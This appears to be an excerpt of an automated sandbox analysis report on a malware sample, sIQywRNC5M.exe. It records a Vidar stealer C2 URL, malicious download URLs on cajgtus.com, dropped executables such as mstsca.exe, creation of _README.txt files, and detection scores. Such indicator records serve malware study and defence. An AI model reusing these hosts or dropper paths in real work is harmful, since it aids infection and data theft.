"C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Multi AV Scanner detection for domain / URL

Source: sdfjhuz.com	Virustotal: Detection: 23%	Perma Link
Source: http://cajgtus.com/test2/get.php	Virustotal: Detection: 14%	Perma Link
Source: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\build2[1].exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\build2[1].exe	Virustotal: Detection: 78%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Virustotal: Detection: 87%	Perma Link

Multi AV Scanner detection for submitted file

Source: sIQywRNC5M.exe	Virustotal: Detection: 42%			Perma Link
Source: sIQywRNC5M.exe	ReversingLabs: Detection: 42%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: sIQywRNC5M.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040E870
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	1_2_0040EA51
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040EAA0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	1_2_0040EC68
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	1_2_00410FC0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00411178 CryptDestroyHash,CryptReleaseContext,	1_2_00411178
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	5_2_0040E870
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	5_2_0040EAA0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	5_2_00410FC0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00411178 CryptDestroyHash,CryptReleaseContext,	5_2_00411178
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	5_2_0040EA51
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	5_2_0040EC68

Source: sIQywRNC5M.exe, 00000005.00000003.2443409930.0000000003198000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_68151f75-c

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Unpacked PE file: 1.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Unpacked PE file: 5.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 7.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Unpacked PE file: 13.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 17.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 22.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 25.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack

Source: sIQywRNC5M.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	File created: C:\Users\user\_README.txt

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.85.65.125:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49730 version: TLS 1.2

Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4071005184.txtAc source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ory\% source: sIQywRNC5M.exe, 00000005.00000003.2498904016.000000000317B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499420917.0000000003182000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2408003930.0000000003148000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407966724.0000000003134000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2504498896.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497603843.00000000036BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2432204625.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407447439.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433719950.00000000033EF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2443737291.000000000359D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433577318.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444886126.00000000035A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\q* source: sIQywRNC5M.exe, 00000005.00000003.2407603026.0000000003247000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432511079.0000000003260000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407898880.0000000003260000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\/ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.000000000366E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2503888250.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2515773524.0000000003336000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: sIQywRNC5M.exe, 00000005.00000003.2432511079.00000000032A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407539885.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433074036.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2408458902.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2434223056.00000000032EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\+J source: sIQywRNC5M.exe, 00000005.00000003.2466724530.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490137312.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465758422.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2466477187.000000000329D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491259032.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491927492.00000000032C7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2433577318.0000000003551000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2408003930.0000000003148000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433755576.0000000003150000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407966724.0000000003134000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433288502.000000000314F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2443884667.000000000356D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2408038974.000000000314F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433171599.0000000003144000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432766191.0000000003134000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2434156614.0000000003155000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000002.2110659562.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.2108532152.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000009.00000000.2109798030.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\es-CO\od.pdb\a\; source: sIQywRNC5M.exe, 00000005.00000003.2518287283.0000000003721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.000000000366E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2504498896.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2511539947.00000000036E2000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2504227018.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2503888250.0000000003584000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2408275863.0000000003213000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2493105669.0000000003635000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2493696832.000000000363C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490698928.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2492669100.000000000360D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465585747.0000000003634000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490315317.00000000035B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2432204625.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2443290568.00000000033BF000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433719950.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2443649043.00000000033EF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2503888250.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000002.2228877025.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000B.00000000.2132609845.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000D.00000000.2227791961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000010.00000000.2233339702.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000010.00000002.2309193789.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000011.00000000.2308477250.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000017.00000002.2728791100.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000017.00000000.2650842338.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001A.00000000.2727770543.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001B.00000000.3241957172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001B.00000002.3340913920.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000000.3340031319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000002.3965266280.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000000.3841712597.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000000.3962943920.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000000.4442019681.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000002.4493003377.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.0000000003761000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2518287283.0000000003721000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2519391634.0000000003762000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: sIQywRNC5M.exe, 00000005.00000003.2490137312.000000000323F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2444323250.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444156089.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1S source: sIQywRNC5M.exe, 00000005.00000003.2504498896.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497603843.00000000036BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2493105669.0000000003635000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2493696832.000000000363C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490698928.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2492669100.000000000360D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465585747.0000000003634000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490315317.00000000035B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2334966830.0000000003232000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2193004950.0000000003232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a source: sIQywRNC5M.exe, 00000005.00000003.2510157688.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: sIQywRNC5M.exe, 00000005.00000003.2408003930.0000000003148000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407966724.0000000003134000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2408038974.000000000314F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: sIQywRNC5M.exe, 00000005.00000003.2506148285.000000000355D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2443737291.000000000359D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432511079.00000000032A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2434064607.00000000032A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433577318.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444886126.00000000035A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.0000000003751000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\N source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ata\ source: sIQywRNC5M.exe, 00000005.00000003.2503888250.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\K source: sIQywRNC5M.exe, 00000005.00000003.2492286668.00000000035AC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2493577171.00000000035AC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2493024480.00000000035AC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465857393.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: sIQywRNC5M.exe, 00000005.00000003.2407898880.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\MpD source: sIQywRNC5M.exe, 00000005.00000003.2466517212.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2466670720.00000000033D3000.00000004.00000020.00020000.00000000.sdmp
